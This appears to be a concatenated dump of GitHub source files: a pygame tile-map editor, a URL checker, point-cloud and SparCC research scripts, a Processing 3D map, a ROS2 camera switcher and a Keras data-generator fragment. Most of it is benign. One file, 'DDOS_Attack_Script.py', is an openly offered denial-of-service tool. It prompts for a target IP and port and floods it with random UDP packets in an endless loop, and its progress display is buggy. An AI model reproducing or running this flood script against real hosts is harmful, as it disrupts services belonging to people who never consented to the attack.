master.destroy()\n\n # leave if they choose cancel\n if not fileName:\n return False\n\n # go through once to get all the unique tile sets\n tileSets = set()\n for i in range(self.tileSize[0]):\n for j in range(self.tileSize[1]):\n try:\n for z in self.pos_z_tile[(i, j)]:\n tile = self.pos_z_tile[(i, j)][z]\n tileSets.add(tile.ts)\n except:\n pass # no tiles at this pos\n\n # open file\n file = open(fileName, \"w\")\n # give header\n file.write(\">>> Tile Source [size x:y]\\n\")\n # add the tilesets and make a dict\n ts_number = {}\n i = 0\n for ts in tileSets:\n file.write(str(i) + \"-> \" + ts[3:] + \" [32:32]\\n\") # [3:] to remove ../\n ts_number[ts] = i\n i += 1\n # give intermediate stuff\n file.write(\">>> Map Size in Tiles (x/y)\\n\" + \\\n str(self.tileSize[0]) + \":\" + str(self.tileSize[1]) + \"\\n\" + \\\n \">>> Setup (Source-> Map col:row/Tile col:row)\")\n\n # go through once more to fill file\n for i in range(self.tileSize[0]):\n for j in range(self.tileSize[1]):\n # position on map\n k = 0\n line = \"\\n\" + str(i) + \":\" + str(j) + \"+\"\n for z in self.pos_z_tile[(i, j)]:\n tile = self.pos_z_tile[(i, j)][z]\n\n # divider if there are more than one zs at this position\n if k > 0:\n line += \"|\"\n\n # file number\n line += (str(ts_number[tile.ts])) + \"->\"\n # tile coord in tileset\n line += str(tile.xy[0]) + \":\" + str(tile.xy[1])\n # blocked\n if tile.blocked:\n line += \"(1)\"\n else:\n line += \"(0)\"\n # z\n line += \"[\" + str(tile.z) + \"]\"\n\n k += 1\n\n if k > 0:\n file.write(line)\n\n file.close()\n\n return True\n\n def loadMap(self):\n master = tk.Tk()\n master.withdraw()\n fileName = filedialog.askopenfilename(initialdir=SAVE_DIR)\n master.destroy()\n\n # leave if they choose cancel\n if not fileName:\n return False\n\n class TileMap:\n def __init__(self, tileFile, squareSize):\n self.tileFile = tileFile\n self.tileImg = pg.image.load(self.tileFile).convert()\n self.tileDict = self.genSubsurfaces(squareSize)\n\n def getTile(self, coords):\n return self.tileDict[coords]\n\n def getName(self):\n return self.tileFile\n\n def genSubsurfaces(self, squareSize):\n tileDict = {}\n imgRect = self.tileImg.get_rect()\n x, y = 0, 0\n morey = True\n while morey:\n while True:\n tile = tile2rect((x, y))\n if imgRect.contains(tile):\n tileDict[(x, y)] = self.tileImg.subsurface(tile)\n x += 1\n else:\n if x == 0:\n morey = False\n else:\n x = 0\n break\n y += 1\n return tileDict\n\n theMap = [line.strip() for line in open(fileName, 'r').readlines()]\n\n line = 1\n\n tileFiles = []\n while not theMap[line].startswith(\">>>\"):\n tileFiles.append(theMap[line])\n line += 1\n for i in range(len(tileFiles)):\n number, temp = tileFiles[i].split(\"-> \")\n number = int(number)\n source, xy = temp.split(\" [\")\n source = \"../\" + source\n xy = xy[:-1].split(\":\")\n xy = (int(xy[0]), int(xy[1]))\n tileFiles[i] = source\n # check that all tileFiles have same res and that they match the given res\n if xy != TILE_RES:\n print(\"Warning: Tile size inconsistency from tile files\")\n raise KeyboardInterrupt\n\n for i in range(len(tileFiles)):\n tileFiles[i] = TileMap(tileFiles[i], TILE_RES)\n\n line += 1\n\n mapSize = tuple([int(i) for i in theMap[line].split(\":\")])\n self.setSize(automated=mapSize)\n\n line += 2\n\n onward = line\n\n maxZ = 0\n for line in theMap[onward:]:\n posOnMap, tiles = line.split(\"+\")\n posOnMap = posOnMap.split(\":\")\n posOnMap = (int(posOnMap[0]), int(posOnMap[1]))\n\n tiles = tiles.split(\"|\")\n\n # self.pos_z_tile[posOnMap] = {}\n for each in tiles:\n # source -> the file the tile img is coming from\n source, temp = each.split(\"->\")\n source = int(source)\n\n # posOnTileFile -> the x,y coords of the img on source\n posOnTileFile, temp = temp.split(\"(\")\n posOnTileFile = posOnTileFile.split(\":\")\n posOnTileFile = (int(posOnTileFile[0]), int(posOnTileFile[1]))\n\n # blocked -> whether or not the tile can be walked on\n blocked, z = temp.split(\")[\")\n blocked = True if blocked == \"1\" else False\n\n # z -> the z the tile is on\n z = int(z[:-1])\n if z > maxZ: maxZ = z + 0\n\n self.pos_z_tile[posOnMap][z] = Tile(tileFiles[source].getName(), posOnTileFile,\n tileFiles[source].getTile(posOnTileFile))\n self.pos_z_tile[posOnMap][z].setCoords(posOnMap, z)\n self.pos_z_tile[posOnMap][z].setBlocked(blocked)\n\n # place the tiles\n while self.currentZ != maxZ + 1:\n for pos in self.pos_z_tile:\n for z in self.pos_z_tile[pos]:\n if z == self.currentZ:\n self.left_click_at((pos[0] * TILE_RES[0], pos[1] * TILE_RES[1]), self.pos_z_tile[pos][z],\n automated_clicking=True)\n self.changeZLevel(1)\n\n while self.currentZ != 0:\n self.changeZLevel(-1)\n\n# def left_hold_at(self, pos):\n# \tif self.surf_rect.collidepoint(pos):\n# \t\tpass\n# \telse:\n# \t\tBox.left_hold_at(pos)\n\n\nclass Tile:\n def __init__(self, tileset, xy, img):\n self.ts = tileset # the files the tile comes from\n self.xy = xy # the xy tile coord of the tile img\n self.img = img # th surface (image) of the tile\n\n self.pos = None # the location on the map\n self.z = None # what z the tile is on\n self.blocked = None # whether or not the tile is blocked\n\n def setCoords(self, pos, z):\n self.pos = pos\n self.z = z\n\n def setBlocked(self, blocked):\n self.blocked = blocked\n\n\nif __name__ == '__main__':\n runMaker()\n","repo_name":"rekabat/Shards-Unnamed","sub_path":"tools/mm.py","file_name":"mm.py","file_ext":"py","file_size_in_byte":36092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36369398379","text":"import requests\n\ntry:\n users = input('enter URL: ')\n r = requests.get(users)\n if r.status_code == 200:\n print(\"Website is up!\")\n else:\n print(\"Website is down :(\")\nexcept:\n print(\"URL not valid, try again! (try with http or https://wwww.websiteofchoice.com)\")\n","repo_name":"N00binatora/URL-Verifier","sub_path":"pop.py","file_name":"pop.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16111220893","text":"import argparse\nimport os\nimport pickle\n\nimport numpy as np\nfrom numpy.typing import NDArray\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Button, Slider\n\nfrom src import utils, viz_utils\nfrom src.real_world import constants\n\n\ndef update_axis(ax, source_obj: NDArray, robotiq_points: NDArray, vmin: float, vmax: float):\n\n ax.clear()\n ax.scatter(source_obj[:, 0], source_obj[:, 1], source_obj[:, 2], color=\"red\", alpha=0.2)\n ax.scatter(robotiq_points[:, 0], robotiq_points[:, 1], robotiq_points[:, 2], color=\"green\", alpha=1.0, s=100)\n ax.set_xlim(vmin, vmax)\n ax.set_ylim(vmin, vmax)\n ax.set_zlim(vmin, vmax)\n\n\ndef main(args):\n\n smin, smax = -2., 2.\n vmin, vmax = -0.3, 0.3\n\n if args.task == \"mug_tree\":\n canon_source = utils.CanonObj.from_pickle(constants.NDF_MUGS_PCA_PATH)\n canon_source.init_scale = constants.NDF_MUGS_INIT_SCALE\n elif args.task == \"bowl_on_mug\":\n canon_source = utils.CanonObj.from_pickle(constants.NDF_BOWLS_PCA_PATH)\n canon_source.init_scale = constants.NDF_BOWLS_INIT_SCALE\n elif args.task == \"bottle_in_box\":\n canon_source = utils.CanonObj.from_pickle(constants.NDF_BOTTLES_PCA_PATH)\n canon_source.init_scale = constants.NDF_BOTTLES_INIT_SCALE\n else:\n raise NotImplementedError()\n\n with open(args.load_path, \"rb\") as f:\n d = pickle.load(f)\n index, pos_robotiq = d[\"index\"], d[\"pos_robotiq\"]\n\n pcd = canon_source.to_pcd(utils.ObjParam(latent=np.zeros(canon_source.n_components)))\n\n pos = pcd[index]\n trans, _, _ = utils.best_fit_transform(pos, pos_robotiq)\n pcd = utils.transform_pcd(pcd, trans)\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n update_axis(ax, pcd, pos_robotiq, vmin, vmax)\n\n slider_axes = []\n z = 0.\n for _ in range(canon_source.n_components + 1):\n slider_axes.append(fig.add_axes([0.25, z, 0.65, 0.03]))\n z += 0.05\n # we start at the bottom and move up\n slider_axes = list(reversed(slider_axes))\n\n sliders = []\n for i in range(canon_source.n_components):\n sliders.append(Slider(slider_axes[i], \"D{:d}\".format(i), smin, smax, valinit=0))\n button = Button(slider_axes[canon_source.n_components], \"Save pcd\")\n\n def sliders_on_changed(val):\n latents = np.array([[s.val for s in sliders]])\n source_pcd = canon_source.to_pcd(utils.ObjParam(latent=latents, scale=np.ones(3) * canon_source.init_scale))\n pos = source_pcd[index]\n trans, _, _ = utils.best_fit_transform(pos, pos_robotiq)\n source_pcd = utils.transform_pcd(source_pcd, trans)\n update_axis(ax, source_pcd, pos_robotiq, vmin, vmax)\n\n def button_on_changed(val):\n latents = np.array([[s.val for s in sliders]])\n obj_param = utils.ObjParam(latent=latents, scale=np.ones(3) * canon_source.init_scale)\n\n source_pcd = canon_source.to_pcd(obj_param)\n pos = source_pcd[index]\n trans, _, _ = utils.best_fit_transform(pos, pos_robotiq)\n source_pcd = utils.transform_pcd(source_pcd, trans)\n pos_trans = utils.transform_pcd(pos, trans)\n\n pos, quat = utils.transform_to_pos_quat(trans)\n obj_param.position = pos\n obj_param.quat = quat\n mesh = canon_source.to_transformed_mesh(obj_param)\n\n dir_path = \"data/warping_figure_4\"\n if not os.path.isdir(dir_path):\n os.makedirs(dir_path)\n i = 1\n for i in range(1, 1000):\n file_path = os.path.join(dir_path, f\"{i}.pcd\")\n if not os.path.isfile(file_path):\n break\n\n mesh.export(os.path.join(dir_path, f\"{i}.stl\"))\n viz_utils.save_o3d_pcd(source_pcd, os.path.join(dir_path, f\"{i}.pcd\"))\n viz_utils.save_o3d_pcd(pos_robotiq, os.path.join(dir_path, f\"points_robotiq_{i}.pcd\"))\n viz_utils.save_o3d_pcd(pos_trans, os.path.join(dir_path, f\"points_source_{i}.pcd\"))\n\n for s in sliders:\n s.on_changed(sliders_on_changed)\n button.on_clicked(button_on_changed)\n\n plt.show()\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"task\", type=str, help=constants.TASKS_DESCRIPTION)\nparser.add_argument(\"load_path\")\nmain(parser.parse_args())\n","repo_name":"ondrejbiza/fewshot","sub_path":"scripts/real_world/viz/show_pick_warping.py","file_name":"show_pick_warping.py","file_ext":"py","file_size_in_byte":4198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5691842314","text":"# using python2.7\n#python '/Users/dingfengwu/Desktop/NAFLD3/yonatanf-sparcc-3aff6141c3f1/SparCC.py' -h\n\nimport os\n\ndef run_cor(SPARCC_PATH, DATA_PATH, OUT_PATH, in_f, out_f, method):\n cmd = \"python \"+\"'\"+SPARCC_PATH+\"SparCC.py' '\"+DATA_PATH+in_f+\"' --cor_file='\"+OUT_PATH+out_f+\"' -a \"+method\n os.system(cmd)\n\ndef run_bootsrap(SPARCC_PATH, DATA_PATH, OUT_PATH, BS_PATH, in_f, out_f, out_p_f, method, times=1000):\n cmd = \"python \"+\"'\"+SPARCC_PATH+\"MakeBootstraps.py' '\"+DATA_PATH+in_f+\"' -n \"+str(times)+\" -t permutation_#.txt -p \"+BS_PATH\n os.system(cmd)\n bs_data_path = BS_PATH\n bs_out_path = BS_PATH\n for i in range(times):\n bs_in_f = 'permutation_'+str(i)+'.txt'\n bs_out_f = 'perm_cor_'+str(i)+'.txt'\n run_cor(SPARCC_PATH, bs_data_path, bs_out_path, bs_in_f, bs_out_f, method)\n cmd = \"python \"+\"'\"+SPARCC_PATH+\"PseudoPvals.py' '\"+OUT_PATH+out_f+\"' \"+BS_PATH+\"perm_cor_#.txt \"+str(times)+\" -o '\"+OUT_PATH+out_p_f+\"_one_sided.csv' -t one_sided\"\n os.system(cmd)\n cmd = \"python \"+\"'\"+SPARCC_PATH+\"PseudoPvals.py' '\"+OUT_PATH+out_f+\"' \"+BS_PATH+\"perm_cor_#.txt \"+str(times)+\" -o '\"+OUT_PATH+out_p_f+\"_two_sided.csv' -t two_sided\"\n os.system(cmd)\n\ndef main(SPARCC_PATH, DATA_PATH, OUT_PATH, BS_PATH, in_f, out_r_f, out_p_f, method, times):\n run_cor(SPARCC_PATH, DATA_PATH, OUT_PATH, in_f, out_r_f, method)\n run_bootsrap(SPARCC_PATH, DATA_PATH, OUT_PATH, BS_PATH, in_f, out_r_f, out_p_f, method, times)\n\n\nSPARCC_PATH = '/Users/dingfengwu/Desktop/NAFLD3/yonatanf-sparcc-3aff6141c3f1/'\nDATA_PATH = '/Users/dingfengwu/Desktop/NAFLD3/Data/RohitNC_Feature_60/'\nOUT_PATH = '/Users/dingfengwu/Desktop/NAFLD3/SparCC/RohitNC_Feature_60/'\nBS_PATH = '/Users/dingfengwu/Desktop/NAFLD3/SparCC/RohitNC_Feature_60/bootstrap/'\nBOOTSTRAP_TIMES = 999\n\n#in_f = 'counts_df.csv' # counts_df.csv counts_df_normal.csv counts_df_obese.csv counts_df_nash.csv\n#method = 'spearman' # spearman sparcc\n#out_r_f = in_f.split('.csv')[0]+'_'+method+'.csv'\n#out_p_f = in_f.split('.csv')[0]+'_'+method+'_p'\n#main(SPARCC_PATH, DATA_PATH, OUT_PATH, BS_PATH, in_f, out_r_f, out_p_f, method, BOOTSTRAP_TIMES)\n\n# 'counts_df.csv', 'counts_df_normal.csv', 'counts_df_obese.csv', 'counts_df_nash.csv'\nfor method in ['sparcc', 'spearman']:\n for in_f in ['counts_df_normal.csv', 'counts_df_nash.csv']:\n out_r_f = in_f.split('.csv')[0]+'_'+method+'.csv'\n out_p_f = in_f.split('.csv')[0]+'_'+method+'_p'\n main(SPARCC_PATH, DATA_PATH, OUT_PATH, BS_PATH, in_f, out_r_f, out_p_f, method, BOOTSTRAP_TIMES)\n","repo_name":"dfwlab/NAFLD_keystone","sub_path":"Code/run_sparcc.py","file_name":"run_sparcc.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"41642277204","text":"\"\"\"\nProva de conceito para mapa em 3D (câmera cotrolada pelo mouse)\n\"\"\"\n\nimport random as rnd\n\nTAMANHO = 50 # tamanho grade\nMAPA = []\n\ndef setup():\n global MAPA, COLUNAS, FILAS\n size(600, 600, P3D)\n COLUNAS = width / TAMANHO\n FILAS = height / TAMANHO\n for fila in range(FILAS):\n for coluna in range(COLUNAS):\n tipo = rnd.choice(Quadrado.TIPOS)\n altura = sorteiaAltura(tipo)\n quadrado = Quadrado(fila, coluna, tipo, altura)\n MAPA.append(quadrado)\n\ndef draw():\n '''for quadrado in MAPA:\n quadrado.desenha()\n '''\n background(0)\n camera(mouseX, mouseY*2, 500.0, # eyeX, eyeY, eyeZ\n width/2,height/2, 0.0, # centerX, centerY, centerZ\n 0.0, 1.0, 0.0) # upX, upY, upZ\n for fila in range(FILAS):\n for coluna in range(COLUNAS):\n quadrado = no_mapa(fila, coluna)\n quadrado.desenha()\n\nclass Quadrado():\n ''' Região quadrada do mapa'''\n \n AMARELO = color(255, 230, 0)\n AZUL_ESCURO = color(7, 0, 255)\n MARROM_ESCURO = color(85, 25, 27)\n VERDE_CLARO = color(10, 237, 7)\n MARROM_CLARO = color(193, 109, 111)\n VERDE_ESCURO = color(48, 72, 36)\n TIPOS = [\"mar\", \"montanha\", \"praia\", \"plano\", \"vila\", \"floresta\"]\n CORES = {\"mar\": AZUL_ESCURO,\n \"montanha\": MARROM_ESCURO,\n \"praia\": AMARELO,\n \"plano\": VERDE_CLARO,\n \"vila\": MARROM_CLARO,\n \"floresta\": VERDE_ESCURO}\n\n def __init__(self, fila, coluna, tipo, altura):\n self.fila = fila\n self.coluna = coluna\n self.tipo = tipo\n self.altura = altura\n self.cor = Quadrado.CORES[tipo]\n\n\n def desenha(self):\n posX, posY = self.coluna * TAMANHO, self.fila * TAMANHO\n with pushMatrix():\n translate(posX, posY)\n noStroke()\n fill(self.cor)\n pushMatrix()\n translate(0,0,self.altura)\n rect(0, 0, TAMANHO, TAMANHO)\n popMatrix()\n fill(255) # branco\n textSize(10) # para escrever o tipo se o mouse estiver perto\n if (dist(posX, posY, mouseX, mouseY) < TAMANHO * 2):\n text(self.tipo, 0, 20, self.altura+5)\n \ndef no_mapa(fila, coluna):\n return MAPA[coluna + fila * COLUNAS]\n \ndef sorteiaAltura(tipo):\n #return 0 #(para demo plana)\n if tipo == \"mar\" or tipo == \"praia\":\n return 0\n elif tipo == \"montanha\":\n return 30\n else:\n return random (5,25)\n\n \n \n","repo_name":"villares/py.processing-play","sub_path":"mapa-jogo/mapa_tosco_3d/mapa_tosco_3d.pyde","file_name":"mapa_tosco_3d.pyde","file_ext":"pyde","file_size_in_byte":2560,"program_lang":"python","lang":"pt","doc_type":"code","stars":23,"dataset":"github-code","pt":"52"} +{"seq_id":"30666380669","text":"import json\nimport os\nimport rclpy\nfrom rclpy.node import Node\nfrom sensor_msgs.msg import Joy\nfrom rcl_interfaces.msg import ParameterDescriptor, IntegerRange, SetParametersResult\nfrom std_srvs.srv import Trigger\nfrom core.msg import Cam\nfrom core.srv import AddCamera\n\n# NOTE:\n # This program has 2 config dictionaries. \n # Standard (self.std_camera_config), and Master (self.master_config).\n # Standard can be changed via GUI parameters. Master cannot.\n # Master is referenced in the process of changing cameras.\n # Master always matches what's currently written in the JSON file.\n # At shutdown, depending on parameters, Standard is written to the JSON file.\n # Neither of these should be confused with self.active_cameras.\n # self.active cameras contains the ips of all of the currently connected cameras.\n # The config files contain all of the currently configured cameras.\n\nclass Camera_Switcher(Node):\n\n def __init__(self):\n super().__init__('camera_switcher')\n\n self.max_cameras = 8 # This is not a hard limit. Can change.\n \n self.log = self.get_logger() # Quick reference for ROS logging\n\n # Stores IPs of active cameras\n # Filling unused slots with empty dictionaries\n self.active_cameras = []\n self.current_camera_index = 0\n\n # Number of unnamed cameras. Used in generating IDs for new cams.\n self.unnamed_cams = 0\n\n # For remembering previous camera button presses\n # This way we only try to change when the button is first pushed\n # And not repeatedly when it is held down\n self.cached_button_input = [0, 0, 0, 0]\n self.cached_camera_index = None\n\n # Define config file path\n self.config_path = \"/home/jhsrobo/corews/src/pilot_gui/cam_config.json\"\n\n # Opens the JSON config file.\n self.check_config_integrity()\n self.open_config() # Creates both Standard and Master Config.\n\n # Set up a service for accepting new cameras from find_cameras\n self.camera_adder = self.create_service(AddCamera, \"add_camera\", self.add_camera_callback)\n\n # Set up a service for returning the first camera to view_cameras\n self.first_camera_srv = self.create_service(Trigger, 'first_camera', self.first_camera_callback)\n\n self.joy_sub = self.create_subscription(Joy, 'joy', self.change_cam_callback, 10)\n self.camera_pub = self.create_publisher(Cam, \"active_camera\", 10)\n\n self.declare_parameter('save_changes_on_shutdown', False)\n self.add_on_set_parameters_callback(self.parameters_callback)\n\n\n # Edit the camera config according to parameters\n # Get the name of the camera that was changed\n # Copy the entry from the intial_camera_config to the new assigned index\n # The entry is written to the new index in camera_config\n # And changes are written permanently depending on parameter\n def parameters_callback(self, params):\n for param in params:\n # List of parameters to ignore in this function\n if param.name not in [\"use_sim_time\", \"permanent_changes\", \"save_changes_on_shutdown\"]:\n new_index = param.value\n ID = param.name.replace('_index', '') # Get ID from parameter name\n master_index = int(self.get_master_index(ID))\n nickname = self.master_config[str(master_index)][\"nickname\"]\n\n # Update the config and the active cameras list\n self.delete_camera_entries(nickname)\n self.std_camera_config[str(new_index)] = self.master_config[str(master_index)]\n\n self.log_camera_assignment_change(nickname, new_index)\n\n return SetParametersResult(successful=True)\n\n\n # When the AddCamera service is requested (from find_cameras.py), \n # add the attached IP to the camera dict.\n def add_camera_callback(self, request, response):\n\n # Check to see if this IP is pre-registered in the config file\n ip_index = self.get_std_index(request.ip)\n if ip_index is not None:\n pass\n else:\n self.create_config_entry(request.ip)\n ip_index = self.get_std_index(request.ip) # Get new index once it's been added to config\n\n self.active_cameras.append(request.ip)\n self.new_cam_parameter(ip_index)\n\n return response\n\n # When view_cameras starts up, it requests for us to publish the currently active camera\n def first_camera_callback(self, request, response):\n if len(self.active_cameras) == 0: # If no cams connected, return early\n response.success = False\n return response\n \n # Get the index of the first camera in active_cameras\n self.current_camera_index = self.get_master_index(self.active_cameras[0])\n self.cached_camera_index = self.current_camera_index\n\n camera_msg = self.create_camera_msg()\n self.camera_pub.publish(camera_msg)\n response.success = True\n return response\n\n\n # Monitor controller input for D-Pad press\n # Used to change active camera\n def change_cam_callback(self, joy):\n\n change = False\n\n if joy.axes[6] or joy.axes[7]:\n # Minor consequence of this logic is:\n # If multiple buttons are pressed, the furthest clockwise takes priority\n # No big deal tbh. About as reasonable a solution as any.\n \n desired_camera_index = False\n\n # Also, this cached input stuff is so that holding the button does not trigger this repeatedly.\n if joy.axes[7] == 1.0 and not self.cached_button_input[0]: # Up button\n desired_camera_index = 1\n change = True\n if joy.axes[6] == -1.0 and not self.cached_button_input[1]: # Right Button\n desired_camera_index = 2\n change = True\n if joy.axes[7] == -1.0 and not self.cached_button_input[2]: # Down button\n desired_camera_index = 3\n change = True\n if joy.axes[6] == 1.0 and not self.cached_button_input[3]: # Left Button\n desired_camera_index = 4\n change = True\n\n # If a button state has changed...\n if change: \n # If there's an entry in the config file for this index...\n if str(desired_camera_index) in self.std_camera_config.keys(): \n # If there's an active camera with that IP...\n if self.std_camera_config[str(desired_camera_index)][\"ip\"] in self.active_cameras:\n # If it's not the same IP as the last one we published...\n if self.cached_camera_index is not desired_camera_index:\n self.current_camera_index = desired_camera_index\n camera_msg = self.create_camera_msg()\n self.camera_pub.publish(camera_msg)\n\n else: # If there is no active camera with that IP\n self.log.warn(\"No camera mapped to that button\") \n else: # If there is no entry in the config file for this index:\n self.log.warn(\"No camera mapped to that button\")\n \n self.cached_button_input = [joy.axes[7], joy.axes[6], joy.axes[7], joy.axes[6]]\n self.cached_camera_index = self.current_camera_index\n\n\n # Function for logging important information after remapping cameras\n def log_camera_assignment_change(self, nickname, new_index):\n \n # Put together a list of the nicknames of active cameras\n nickname_list = []\n for ip in self.active_cameras:\n master_index = self.get_master_index(ip)\n nickname_list.append(self.master_config[master_index][\"nickname\"])\n self.log.info('')\n self.log.info(\"{} camera assigned to index {}\".format(nickname, new_index))\n self.log.info(\"Assigned Camera List: {}\".format(self.get_nickname_printout()))\n\n\n # Creates a new parameter for a camera\n def new_cam_parameter(self, index):\n\n # Define the parameter settings\n int_range = IntegerRange()\n int_range.from_value = 1\n int_range.to_value = self.max_cameras\n int_range.step = 1\n ID = self.std_camera_config[index][\"ID\"]\n param_name = '{}_index'.format(ID)\n\n descriptor = ParameterDescriptor(integer_range = [int_range])\n\n self.declare_parameter(param_name, int(index), descriptor)\n\n\n # Populate a camera msg with all of the info about the current camera\n def create_camera_msg(self):\n index = str(self.current_camera_index)\n camera_msg = Cam()\n camera_msg.index = int(index)\n camera_msg.ip = self.std_camera_config[index][\"ip\"]\n camera_msg.gripper = self.std_camera_config[index][\"gripper\"]\n camera_msg.nickname = self.std_camera_config[index][\"nickname\"]\n\n return camera_msg\n\n\n # Generate a readable version of the current active cameras\n def get_nickname_printout(self):\n printout = {}\n for index in self.std_camera_config:\n if index != 0:\n printout[index] = self.std_camera_config[index][\"nickname\"]\n else:\n printout[index] = \" \"\n return str(printout)\n\n\n # Read the existing camera config into a dictionary\n # JSON files are read into nested dictionaries.\n # Also, keep in mind that although the key values are numbers 1-4, they are strings, not ints.\n def open_config(self):\n with open(self.config_path) as f:\n self.std_camera_config = json.load(f)\n\n # Save a version of the config for refererence when cameras are changed during runtime\n with open(self.config_path) as f:\n self.master_config = json.load(f)\n\n\n # Checks if the config file still exists.\n # If it doesn't, it creates a new one.\n def check_config_integrity(self):\n if os.path.isfile(self.config_path): \n return True\n else:\n empty_dict = {}\n self.log.info(\"cam_config.json not found\")\n self.log.info(\"Creating new camera config\")\n self.log.info(\"Edit pilot_gui/cam_config.json to save your settings\")\n with open(self.config_path, \"w\") as f:\n json.dump(empty_dict, f)\n\n\n # Scans the standard config for a certain attribute in inner dictionaries\n # Returns the index of that attribute if found\n def get_std_index(self, value):\n for index in self.std_camera_config:\n for key in self.std_camera_config[index]:\n if self.std_camera_config[index][key] == value:\n return index\n return None\n \n\n # Scans the master config for a certain attribute in inner dictionaries\n # Returns the index of that attribute if found\n def get_master_index(self, value):\n for index in self.master_config:\n for key in self.master_config[index]:\n if self.master_config[index][key] == value:\n return index\n return None\n\n\n # These functions search their indices for empty dict keys\n # If none are found, they create a new one.\n def find_available_std_index(self):\n for key in self.std_camera_config:\n if self.std_camera_config[key] == 0:\n return key\n return str(len(self.std_camera_config) + 1)\n\n\n def find_available_master_index(self):\n for key in self.master_config:\n if self.master_config[key] == 0:\n return key \n return str(len(self.master_config) + 1)\n\n\n # Creates a new entry in the config files for new cameras\n def create_config_entry(self, ip, gripper=\"Front\", ID=\"unnamed\", nickname = \"Unnamed\"):\n std_index = self.find_available_std_index() # Assign a new index\n master_index = self.find_available_master_index()\n \n # Give each unnamed cam a unique identifier\n if \"unnamed\" in ID or \"Unnamed\" in nickname:\n self.unnamed_cams +=1\n if ID == \"unnamed\":\n ID += str(self.unnamed_cams)\n if nickname == \"Unnamed\":\n nickname += str(self.unnamed_cams)\n \n self.std_camera_config[std_index] = { \"ip\" : ip,\n \"gripper\" : gripper,\n \"nickname\" : nickname,\n \"ID\" : ID }\n self.master_config[master_index] = { \"ip\" : ip,\n \"gripper\" : gripper,\n \"nickname\" : nickname,\n \"ID\" : ID }\n\n self.write_to_config()\n self.log.info(\"\")\n self.log.info(\"Created new camera config entry\")\n\n\n # Updates the contents of the config file with the contents of self.std_camera_config\n # Setting save_changes high means that it writes the std_camera_config to the JSON\n # This means that changes we made during runtime are reflected in the config file.\n # Otherwise, only new cameras will be added to the config file.\n def write_to_config(self, save_changes=False):\n config_json = json.dumps(self.master_config, indent=2)\n if save_changes: \n config_json = json.dumps(self.std_camera_config, indent=2)\n \n with open(self.config_path, \"w\") as f:\n f.write(config_json)\n\n # Simple getter to run at shutdown\n def get_save_changes (self):\n return self.get_parameter(\"save_changes_on_shutdown\").value\n \n\n def delete_camera_entries(self, nickname):\n target_index = self.get_std_index(nickname)\n while target_index is not None:\n self.std_camera_config.pop(str(target_index))\n target_index = self.get_std_index(nickname)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n camera_switcher = Camera_Switcher()\n\n # Runs the program until shutdown is recieved\n try: rclpy.spin(camera_switcher)\n except KeyboardInterrupt:\n save_changes = camera_switcher.get_save_changes()\n camera_switcher.write_to_config(save_changes)\n\n # On shutdown, kill node\n camera_switcher.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JHSRobo/pilot_gui","sub_path":"pilot_gui/switch_cameras.py","file_name":"switch_cameras.py","file_ext":"py","file_size_in_byte":14361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"24544709914","text":"import sys\nimport os\nimport time\nimport socket\nimport random\nfrom datetime import datetime\n\n# Code Time\nnow = datetime.now()\nhour, minute, day, month, year = now.hour, now.minute, now.day, now.month, now.year\n\n# Create a UDP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nbytes = random._urandom(1490)\n\n# Clear the screen\nos.system(\"clear\")\n\n# Print header\nprint(\"DDoS Attack Script\")\nprint(\"Author : HA-MRX\")\nprint(\"You Tube : https://www.youtube.com/channel/UCCgy7i_A5yhAEdY86rPOinA\")\nprint(\"github : https://github.com/Ha3MrX\")\nprint(\"Facebook : https://www.facebook.com/muhamad.jabar222\")\nprint()\n\n# Get the target IP and port from the user\nip = input(\"IP Target : \")\nport = int(input(\"Port : \"))\n\n# Clear the screen\nos.system(\"clear\")\nprint(\"Attack Starting\")\n\n# Attack loop\nfor _ in range(5):\n time.sleep(5)\n print(f\"[{'=' * (len(_) + 1)}{' ' * (4 - len(_))}] {_ * 25}%\")\n\nsent = 0\nwhile True:\n sock.sendto(bytes, (ip, port))\n sent += 1\n port += 1\n print(f\"Sent {sent} packet to {ip} through port: {port}\")\n if port == 65534:\n port = 1\n","repo_name":"avinashkranjan/Pentesting-and-Hacking-Scripts","sub_path":"Ddos_Attack_Script/DDOS_Attack_Script.py","file_name":"DDOS_Attack_Script.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"52"} +{"seq_id":"73810280804","text":"# 1.세이브\n# 2.세이브한뒤에 주석처리\n# 3.\n\n# import os\n\n# # horses/humans 데이터셋 경로 지정\n# train_horse_dir = '../_data/image/horse-or-human/horses'\n# train_human_dir = '../_data/image/horse-or-human/humans'\n\n# # horses 파일 이름 리스트\n# train_horse_names = os.listdir(train_horse_dir)\n# print(train_horse_names[:10])\n\n# # humans 파일 이름 리스트\n# train_human_names = os.listdir(train_human_dir)\n# print(train_human_names[:10])\n\n# # horses/humans 총 이미지 파일 개수\n# print('total training horse images:', len(os.listdir(train_horse_dir))) #500\n# print('total training human images:', len(os.listdir(train_human_dir))) #527\n\nimport numpy as np\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(\n rescale = 1./255,\n horizontal_flip=True,\n vertical_flip=True,\n width_shift_range=0.1,\n height_shift_range=0.1,\n rotation_range=5,\n zoom_range=0.1,\n shear_range=0.1,\n fill_mode='nearest',\n \n featurewise_center=True,\n featurewise_std_normalization=True, \n validation_split=0.2\n)\n\ntest_datagen = ImageDataGenerator( #평가만 해야하기 때문에 증폭할 필요성이 없다.\n rescale=1./255\n) #Found 160 images belong to 2 classes.\n\n# D:\\_data\\image\\brain\n\ntrain_generator = train_datagen.flow_from_directory(\n '../_data/image/horse-or-human',\n 